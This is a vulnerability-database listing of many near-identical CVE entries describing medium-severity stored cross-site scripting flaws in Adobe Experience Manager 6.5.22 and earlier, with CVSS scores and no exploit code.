Experience Manager
-
CVE-2025-47030
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47029
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47027
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47026
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47025
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47022
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47021
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47020
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47019
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47017
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47016
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47015
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47014
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47013
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47012
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47011
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47010
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47008
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47007
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47006
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47005
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47004
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47003
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47002
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47000
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46999
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46997
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46995
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46992
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46991
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46990
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46989
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46988
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46987
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46986
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46985
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46984
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46983
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46982
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46981
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46979
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46978
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46977
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46976
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46975
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46974
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46973
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46972
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46971
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46970
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46968
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46967
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46966
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46965
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46964
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46963
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46960
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46957
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46956
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46955
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46954
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46953
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. Scope is changed.
Adobe
XSS
Experience Manager
-
CVE-2025-46952
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46951
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46950
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46949
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46948
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46947
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46946
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46945
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46944
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46943
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46942
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46941
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46940
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46939
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46935
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46934
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46933
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46931
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46930
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46929
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46927
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46926
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46924
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46923
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46922
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46920
MEDIUM
CVSS 4.6
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46919
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46918
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-46917
MEDIUM
CVSS 5.4
